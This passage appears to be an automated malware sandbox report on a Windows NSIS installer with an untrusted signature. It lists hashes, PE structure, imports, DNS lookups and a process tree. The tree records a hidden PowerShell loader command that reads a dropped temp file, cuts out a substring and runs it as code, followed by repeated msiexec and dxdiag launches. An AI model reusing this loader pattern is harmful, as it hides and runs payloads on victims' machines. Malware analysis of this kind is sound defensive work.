                              Preview:MSCF....Z.......D................/..........Z....J..........d.......................environment.xml........CK....8.....w..=.9%T`.eu:.jn.E.8......m_.o?...5.K.{.3X3....^.{i..b......{.+.....y:..KW;;\..n.K=.]k..{.=..3......D$.&IQH.$-..8.r.{..HP.........g....^..~......e.f2^..N.`.B..o.t....z..3..[#..{S.m..w....<M...j..6.k.K.....~.SP.mx..;N.5..~\.[.!gP...9r@"82"%.B%..<2.c....vO..hB.Fi....{...;.}..f|..g.7..6..].7B..O..#d..]Ls.k..Le...2.*..&I.Q.,....0.\.-.#..L%.Z.G..K.tU.n...J..TM....4....~...:..2.X..p.d....&.Bj.P(.."..).s.d....W.=n8...n...rr..O._.yu...R..$....[...=H"K<.`.e...d.1.3.gk....M..<R......%1BX.[......X.....q......:...3..w....QN7. .qF..A......Q.p...*G...JtL...8sr.s.eQ.zD.u...s.....tjj.G.....Fo...f`Bb<.]k..e.b..,.....*.1.:-....K.......M..;....(,.W.V(^_.....9.,`|...9...>..R...2|.|5.r....n.y>wwU..5...0.J...*.H........J.0.I....1.0...`.H.e......0....+.....7......0..0V..+.....7....H.......$f.....`..41200..+.....7...1". ...>^..~a..e.D.V.C...

                              C:\Windows\SoftwareDistribution\SLS\E7A50285-D08D-499D-9FF8-180FDC2332BC\sls.cab

                              Download File
                              Process:C:\Windows\System32\SIHClient.exe
                              File Type:Microsoft Cabinet archive data, single, 11149 bytes, 1 file, at 0x44 +Utf "environment.cab", flags 0x4, ID 18779, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
                              Category:dropped
                              Size (bytes):30005
                              Entropy (8bit):7.7369400192915085
                              Encrypted:false
                              SSDEEP:768:ouCAyCeQ8fkZdfTGo/its89z8gjP69zA4:Aqf56z8HzT
                              MD5:4D7FE667BCB647FE9F2DA6FC8B95BDAE
                              SHA1:B4B20C75C9AC2AD00D131E387BCB839F6FAAABCA
                              SHA-256:BE273EA75322249FBF58C9CAD3C8DA5A70811837EF9064733E4F5FF1969D4078
                              SHA-512:DDB8569A5A5F9AD3CCB990B0A723B64CEE4D49FA6515A8E5C029C1B9E2801F59259A0FC401E27372C133952E4C4840521419EF75895260FA22DFF91E0BE09C02
                              Malicious:false
                              Preview:MSCF.....+......D...............[I...........+...I..........d.......rM..............environment.cab...Q.!+rMCK.|.XT....CI7.....AR..$..C$D....RA:....T..........o...g...>.....s....z...>..<...J.R.A......%}..... 0............\...e.z...@..{..,./.:9:X8.s^q...>.(]...I)....'..v@....!.(.i.n.!.g.8\/.+X3.E.~.pi...Q...B...."Oj..~.:....M....uB.}..v.WR........tDD......D7..j..`..5..E.2.z..C....4.s....r..Y.:.|.mtg...S..b._.....!.~Kn..E.=...x.N..e.)....xz...p..h.;..xR'...U.}........nK.+.Y........p..r _.;?.m}$..*%&...8. 7..T....,7..F...e...kI.y...q....".W.W..[..gZQ.....W.$k.T"...N.*...5.R...,+...u.~VO...R-......H7..9........].K....]....tS~*.LSi....T....3+........k......i.J.y...,.Y|.N.t.LX.....zu..8......S*7..{y.m.....Ob.....^.S8Kn.i.._.c~.x.ce.A...t........S.......i1......V..S]H....$..J....E..j...4...o.$..).....;.n<.b.}.(.J.]...Q..u,.-.Bm.[z.j..-i.."...._v.......N..+...g..v..../...;G.Yw....0..u...z....J..K.E..s&..u.h3.]J.G............Z....=.N.X..

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                              Entropy (8bit):7.49524760839857
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:MPkM9Dd99B.exe
                              File size:1'352'888 bytes
                              MD5:2afc878d1fcfb41b15beafb1faab9edb
                              SHA1:97cf12f3fd3d4e6fa6010d05fdfa8e7d3cbeba55
                              SHA256:8f05778ed21cceef05e278694c609c70659bdc5fc7a975630224c922544689f0
                              SHA512:32bd0b94355f1011411a3bb6f38b029a128361621fde68e16e49ea21ab46fbb899295b7b6f89d543aca8933f285b10fad94feaa14df1a1276d8b42709844eb4f
                              SSDEEP:24576:HdcS1TkwkTy/6WLFtT2xNB9NID3Fg3+oTc6oIU:9X1Tkw+yisT2xD9NI5gOoT9nU
                              TLSH:4855D0E3A6110E89C67E82FD8657C154510A6F7ED868D60E31B3362EFDF2D478C4E84A
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.w.F.*.....F...v...F...@...F.Rich..F.........PE..L....C.f.................h...x.......3............@

                              File Icon

                              Icon Hash:fd3ecf696931318d

                              Static PE Info

                              General

                              Entrypoint:0x4033d8
                              Entrypoint Section:.text
                              Digitally signed:true
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Time Stamp:0x660843F9 [Sat Mar 30 16:55:21 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:671f2a1f8aee14d336bab98fea93d734

                              Authenticode Signature

                              Signature Valid:false
                              Signature Issuer:CN=Modificeret, O=Modificeret, L=Fellows, C=US
                              Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                              Error Number:-2146762487
                              Not Before, Not After
                              • 26/08/2024 12:35:47 26/08/2027 12:35:47
                              Subject Chain
                              • CN=Modificeret, O=Modificeret, L=Fellows, C=US
                              Version:3
                              Thumbprint MD5:B14FCBD05D239BB66E64884964E7C3BB
                              Thumbprint SHA-1:CF0B5FDD8DBAEE379812EAE53CCC6D3A57C78060
                              Thumbprint SHA-256:AAE8FC31F6530FEEFC9141F189C9489005ED507B5FC1F78971F832E72726DFB2
                              Serial:0CA0626EFC9237A43F5473D856147A6DD0A9F87E

                              Entrypoint Preview

                              Instruction
                              push ebp
                              mov ebp, esp
                              sub esp, 00000224h
                              push esi
                              push edi
                              xor edi, edi
                              push 00008001h
                              mov dword ptr [ebp-14h], edi
                              mov dword ptr [ebp-0Ch], 0040A188h
                              mov dword ptr [ebp-08h], edi
                              mov byte ptr [ebp-04h], 00000020h
                              call dword ptr [0040809Ch]
                              mov esi, dword ptr [004080A0h]
                              lea eax, dword ptr [ebp-000000C4h]
                              push eax
                              mov dword ptr [ebp-000000B0h], edi
                              mov dword ptr [ebp-30h], edi
                              mov dword ptr [ebp-2Ch], edi
                              mov dword ptr [ebp-000000C4h], 0000009Ch
                              call esi
                              test eax, eax
                              jne 00007FD3588FF421h
                              lea eax, dword ptr [ebp-000000C4h]
                              mov dword ptr [ebp-000000C4h], 00000094h
                              push eax
                              call esi
                              cmp dword ptr [ebp-000000B4h], 02h
                              jne 00007FD3588FF40Ch
                              movsx cx, byte ptr [ebp-000000A3h]
                              mov al, byte ptr [ebp-000000B0h]
                              sub ecx, 30h
                              sub al, 53h
                              mov byte ptr [ebp-2Ah], 00000004h
                              neg al
                              sbb eax, eax
                              not eax
                              and eax, ecx
                              mov word ptr [ebp-30h], ax
                              cmp dword ptr [ebp-000000B4h], 02h
                              jnc 00007FD3588FF404h
                              and byte ptr [ebp-2Ah], 00000000h
                              cmp byte ptr [ebp-000000AFh], 00000041h
                              jl 00007FD3588FF3F3h
                              movsx ax, byte ptr [ebp-000000AFh]
                              sub eax, 40h
                              mov word ptr [ebp-30h], ax
                              jmp 00007FD3588FF3E6h
                              mov word ptr [ebp-30h], di
                              cmp dword ptr [ebp-000000C0h], 0Ah
                              jnc 00007FD3588FF3EAh
                              and word ptr [ebp+00000000h], 0000h

                              Rich Headers

                              Programming Language:
                              • [EXP] VC++ 6.0 SP5 build 8804

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x853c0xa0.rdata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x430000x637b0.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x149bb00x908
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x80000x294.rdata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x10000x660c0x68003b90adcd2f1248db844446cb2ef15486False0.6663912259615384data6.411908920093797IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rdata0x80000x13400x1400b3bd9ad1bd1020c5cf4d51a4d7b61e07False0.4576171875data5.237673976044139IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .data0xa0000x251380x600c4e774255fea540ed5efa114edfa6420False0.4635416666666667data4.1635686587741IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .ndata0x300000x130000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc0x430000x637b00x638007ec750b400c18fb2808562fed9408957False0.28931032113693467data5.302493764322081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                              Resources

                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_ICON0x433280x4180cDevice independent bitmap graphic, 255 x 510 x 32, image size 260100EnglishUnited States0.24935519940365264
                              RT_ICON0x84b380x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536EnglishUnited States0.3378238495208802
                              RT_ICON0x953600x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864EnglishUnited States0.38897939878074417
                              RT_ICON0x9e8080x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384EnglishUnited States0.43522673594709493
                              RT_ICON0xa2a300x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States0.46856846473029046
                              RT_ICON0xa4fd80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304EnglishUnited States0.559016393442623
                              RT_ICON0xa59600x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024EnglishUnited States0.6312056737588653
                              RT_DIALOG0xa5dc80x120dataEnglishUnited States0.5138888888888888
                              RT_DIALOG0xa5ee80x11cdataEnglishUnited States0.6056338028169014
                              RT_DIALOG0xa60080xc4dataEnglishUnited States0.5918367346938775
                              RT_DIALOG0xa60d00x60dataEnglishUnited States0.7291666666666666
                              RT_GROUP_ICON0xa61300x68dataEnglishUnited States0.7788461538461539
                              RT_VERSION0xa61980x2d8dataEnglishUnited States0.47527472527472525
                              RT_MANIFEST0xa64700x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

                              Imports

                              DLLImport
                              ADVAPI32.dllRegEnumValueA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, RegOpenKeyExA, RegCreateKeyExA
                              SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteExA
                              ole32.dllOleUninitialize, OleInitialize, IIDFromString, CoCreateInstance, CoTaskMemFree
                              COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                              USER32.dllSetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcA, GetMessagePos, CheckDlgButton, LoadCursorA, SetCursor, GetSysColor, SetWindowPos, GetWindowLongA, IsWindowEnabled, SetClassLongA, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetDlgItemTextA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, MessageBoxIndirectA, CharPrevA, PeekMessageA, GetClassInfoA, DispatchMessageA, TrackPopupMenu
                              GDI32.dllGetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor
                              KERNEL32.dllCreateFileA, GetTempFileNameA, ReadFile, RemoveDirectoryA, CreateProcessA, CreateDirectoryA, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceA, lstrcpynA, SetErrorMode, GetVersionExA, lstrlenA, GetCommandLineA, GetTempPathA, GetWindowsDirectoryA, WriteFile, ExitProcess, CopyFileA, GetCurrentProcess, GetModuleFileNameA, GetFileSize, GetTickCount, Sleep, SetFileAttributesA, GetFileAttributesA, SetCurrentDirectoryA, MoveFileA, GetFullPathNameA, GetShortPathNameA, SearchPathA, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, GetModuleHandleA, LoadLibraryExA, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv, lstrcpyA, MoveFileExA, lstrcatA, WideCharToMultiByte, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableA

                              Possible Origin

                              Language of compilation systemCountry where language is spokenMap
                              EnglishUnited States

                              Network Behavior

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Jan 11, 2025 08:22:09.011137962 CET1.1.1.1192.168.2.80xecd3No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                              Jan 11, 2025 08:22:09.011137962 CET1.1.1.1192.168.2.80xecd3No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.20A (IP address)IN (0x0001)false
                              Jan 11, 2025 08:22:09.011137962 CET1.1.1.1192.168.2.80xecd3No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.35A (IP address)IN (0x0001)false
                              Jan 11, 2025 08:22:09.011137962 CET1.1.1.1192.168.2.80xecd3No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.36A (IP address)IN (0x0001)false
                              Jan 11, 2025 08:22:09.011137962 CET1.1.1.1192.168.2.80xecd3No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.39A (IP address)IN (0x0001)false
                              Jan 11, 2025 08:22:09.011137962 CET1.1.1.1192.168.2.80xecd3No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.18A (IP address)IN (0x0001)false
                              Jan 11, 2025 08:22:09.011137962 CET1.1.1.1192.168.2.80xecd3No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.34A (IP address)IN (0x0001)false
                              Jan 11, 2025 08:22:09.011137962 CET1.1.1.1192.168.2.80xecd3No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.19A (IP address)IN (0x0001)false
                              Jan 11, 2025 08:22:09.011137962 CET1.1.1.1192.168.2.80xecd3No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.23A (IP address)IN (0x0001)false
                              Jan 11, 2025 08:22:22.572841883 CET1.1.1.1192.168.2.80x376aNo error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                              Jan 11, 2025 08:22:22.572841883 CET1.1.1.1192.168.2.80x376aNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.23A (IP address)IN (0x0001)false
                              Jan 11, 2025 08:22:22.572841883 CET1.1.1.1192.168.2.80x376aNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.34A (IP address)IN (0x0001)false
                              Jan 11, 2025 08:22:22.572841883 CET1.1.1.1192.168.2.80x376aNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.35A (IP address)IN (0x0001)false
                              Jan 11, 2025 08:22:22.572841883 CET1.1.1.1192.168.2.80x376aNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.18A (IP address)IN (0x0001)false
                              Jan 11, 2025 08:22:22.572841883 CET1.1.1.1192.168.2.80x376aNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.20A (IP address)IN (0x0001)false
                              Jan 11, 2025 08:22:22.572841883 CET1.1.1.1192.168.2.80x376aNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.36A (IP address)IN (0x0001)false
                              Jan 11, 2025 08:22:22.572841883 CET1.1.1.1192.168.2.80x376aNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.19A (IP address)IN (0x0001)false
                              Jan 11, 2025 08:22:22.572841883 CET1.1.1.1192.168.2.80x376aNo error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.39A (IP address)IN (0x0001)false
                              Jan 11, 2025 08:23:11.656239986 CET1.1.1.1192.168.2.80xc73dNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                              Jan 11, 2025 08:23:11.656239986 CET1.1.1.1192.168.2.80xc73dNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false

                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Target ID:0
                              Start time:02:21:51
                              Start date:11/01/2025
                              Path:C:\Users\user\Desktop\MPkM9Dd99B.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\MPkM9Dd99B.exe"
                              Imagebase:0x400000
                              File size:1'352'888 bytes
                              MD5 hash:2AFC878D1FCFB41B15BEAFB1FAAB9EDB
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:true

                              General

                              Target ID:2
                              Start time:02:21:52
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:powershell.exe -windowstyle hidden "$Beseen=gc -raw 'C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Ondskaben.Liv';$Handcrafts=$Beseen.SubString(65861,3);.$Handcrafts($Beseen) "
                              Imagebase:0xe50000
                              File size:433'152 bytes
                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:false

                              General

                              Target ID:3
                              Start time:02:21:52
                              Start date:11/01/2025
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff6ee680000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:false

                              General

                              Target ID:4
                              Start time:02:22:07
                              Start date:11/01/2025
                              Path:C:\Windows\System32\SIHClient.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\sihclient.exe /cv HhVnUyAsTUmprDuizOSkrg.0.2
                              Imagebase:0x7ff72af10000
                              File size:380'720 bytes
                              MD5 hash:8BE47315BF30475EEECE8E39599E9273
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:true

                              General

                              Target ID:5
                              Start time:02:22:34
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                              Imagebase:0x690000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:6
                              Start time:02:22:34
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                              Imagebase:0x690000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:7
                              Start time:02:22:34
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                              Imagebase:0x690000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:8
                              Start time:02:22:34
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                              Imagebase:0x690000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:9
                              Start time:02:22:34
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                              Imagebase:0x690000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:10
                              Start time:02:22:34
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                              Imagebase:0x690000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:11
                              Start time:02:22:34
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                              Imagebase:0x690000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:12
                              Start time:02:22:34
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                              Imagebase:0x690000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:13
                              Start time:02:22:35
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                              Imagebase:0x690000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:14
                              Start time:02:22:35
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                              Imagebase:0x690000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:15
                              Start time:02:22:35
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\dxdiag.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                              Imagebase:0xe70000
                              File size:222'720 bytes
                              MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:16
                              Start time:02:22:35
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\dxdiag.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                              Imagebase:0xe70000
                              File size:222'720 bytes
                              MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:17
                              Start time:02:22:35
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\dxdiag.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                              Imagebase:0xe70000
                              File size:222'720 bytes
                              MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:18
                              Start time:02:22:35
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\dxdiag.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                              Imagebase:0xe70000
                              File size:222'720 bytes
                              MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:19
                              Start time:02:22:35
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\dxdiag.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                              Imagebase:0xe70000
                              File size:222'720 bytes
                              MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:20
                              Start time:02:22:35
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\dxdiag.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                              Imagebase:0xe70000
                              File size:222'720 bytes
                              MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:21
                              Start time:02:22:35
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\dxdiag.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                              Imagebase:0xe70000
                              File size:222'720 bytes
                              MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:22
                              Start time:02:22:35
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\dxdiag.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                              Imagebase:0xe70000
                              File size:222'720 bytes
